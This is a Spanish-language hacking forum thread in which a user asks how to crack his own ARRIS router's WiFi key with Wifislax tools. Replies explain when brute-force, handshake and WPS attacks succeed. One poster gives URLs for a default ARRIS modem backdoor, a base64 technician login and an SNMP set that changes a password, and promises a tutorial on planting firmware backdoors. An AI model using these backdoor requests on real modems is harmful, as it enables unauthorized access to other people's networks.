DuDA sobre fabricante Router ARRIS

Iniciado por Robotgc, 24 Mayo 2015, 22:55 PM

0 Miembros y 1 Visitante están viendo este tema.

Robotgc

hOLA ME un saludo antes que nada, he tratado de auditar Mr propia red ARRIS he utilzado varios metodos en wifislax tanto en 4.9 como el 4.10.1 pero ni Linset ni los otros progamas me dan la clave, ultimamente he utilzado Handsaker me da el handasaker pero tengo una duda ya que del Reuter solo se que ARRIS es el fabricante pero en las opciones de Brutushack aparecen con su respectivo asterisco en verde:
orange-xxxx
Tp-link-xxxxxx
Wlan-xxxx-00:19:15
Technicolor
ONOXXXX8netgear)
LINKSSYS & D-link
:-( y es en donde recae mi duda... me pueden ayudar  :rolleyes:

Sh4k4

Citarhe utilzado varios metodos en wifislax tanto en 4.9 como el 4.10.1 pero ni Linset ni los otros progamas me dan la clave
claro que funcionan solo mete la clave en el diccionario y listo!!

Robotgc

Cita de: Sh4k4 en 25 Mayo 2015, 08:00 AM
claro que funcionan solo mete la clave en el diccionario y listo!!
Exacto introduciendo la cLAVE aL diciionario se obtiene, pero quisiera experimentar y probar la vulnerabilidad de este reuter propio
por eso necesito que alguien me de alguna pista de cual opción elegir de los siguiENtes fabricantes:
orange-xxxx
Tp-link-xxxxxx
Wlan-xxxx-00:19:15
Technicolor
ONOXXXX8netgear)
LINKSSYS & D-link
Ya que utiZAdo Goyscript Wpa Me dice que el fabricante es ARRIS Group INC.
lO MISMO ME DICE ESTA WEB QUE SE ENCARGA DE BUSCAR EL FABRICANTE MEDIANTE MAC adress http://www.coffer.com/mac_find/?string=14-cf-e2-ce-2e-10
y otros progamas como el inSSIDer no dan el fabricante ya he buscado y gooogleado sin exito  >:D,simplificando, necesito el vinculo de esos 5 fabricantes con Arris.Group ya que no aperece como tal...
Gracias por tu respuesta! ::)

engel lex

cual vulnerabilidad quieres experimentar?
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Robotgc

Cita de: engel lex en 26 Mayo 2015, 20:28 PM
cual vulnerabilidad quieres experimentar?
Hola pues simplemente verificar si eSTE router Arris  puede ser seguro 0% vulnerable a  ataques de este tipo de utilidades como en este caso Handsaker-Brutus hack, ya que en las otras utilidades he comprobado que realmente  es muy dificil obtener el pass, es con fines preventivos unicamente...sabees que opción deb0 de elegir?
Gracias por tu respuesta!

engel lex

basicamente todo dispositivo es seguro a fuerza bruta... por algo se llama "fuerza bruta" es literalmente probar tooooooodas las posibles opciones... si la contraseña tiene por lo menos 8 caracteres de largo, puedes olvidarlo...

muchas de estas tecnicas no son realmente necesarias probarlas, solo hay que ver como está configurado el router y en que se basa la tecnica... por eso es importante aprender en lugar de dar cabezazos... pierdes mucho menos tiempo y posiblemente llegas a mejores resultados...

-si tienes contraseña wpa, olvidate de hacer fuerza bruta
-el handshake solo sirve si la clave existe en un diccionario
-el lindset si el usuario sabe la contraseña (no sucede siempre) y es tonto
-ataques a wps solo funcionan si está activo, si no requiere presionar el boton y si no tiene protección de tiempo (en este ultimo caso no es inutil, pero requiere demasiado tiempo)
-vulnerabilidades de claves puestas por proveedor, hay que revisar si la clave es predecible (o tienes muchos recursos de experiementación y sabes matematica, o averiguas en internet)
-backdoor, depende del router (investigar por internet)

de ahí en más hay pocas tecnicas
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

scott_

Pues yo le he encontrado una vulnerabilidad.

Escribe en tu url la ip de tu modem:
192.168.100:8080/login?dGVjaG5pY2lhbjo=
El puerto 80 nunca nos decepciona  ;D

Y por ultimo 192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;

Comenta me, lo que sucedió, quiero saber si mi trabajo funciona.
Saludos.
Si no intentas salvar una vida, jamás salvarás la de nadie más

Hurdano

Scott, y para que es eso?osea por curiosidad, me gustaría saber que es lo que hace la técnica que has descrito

scott_

Cita de: Hurdano en 27 Mayo 2015, 09:08 AM
Scott, y para que es eso?osea por curiosidad, me gustaría saber que es lo que hace la técnica que has descrito

Es un backdoor que tiene por defeco el modem.

Muy pronto voy a subir un tutorial que estuve elaborando hace 1 año.
De como poner una puerta trasera a un modem.
Ósea en el mismo inicio de sesión pongas otro usuario.
Y hasta porque no, modificar el nombre del modem por defecto.
Desde un Firmware.

Nunca falto en los BackDoors Engel lex  ;D
Saludos.
Si no intentas salvar una vida, jamás salvarás la de nadie más

Hurdano

Pues sería genial Scott, sin duda un buen aporte.

Yo espero acabar pronto el libro que estoy leyendo, aunque lo malo es que no me da tiempo a desarrollar las prácticas aún, pero bueno, primero lo leo, se de que va el tema más o menos y luego una vez leido ya se moverme por el libro e ir buscando lo que necesite en cada momento. Pero me quedan aún muhooooooooos. Digo todo esto porque hasta que yo pueda aportar algo a la comunidad uff... sed pacientes xD.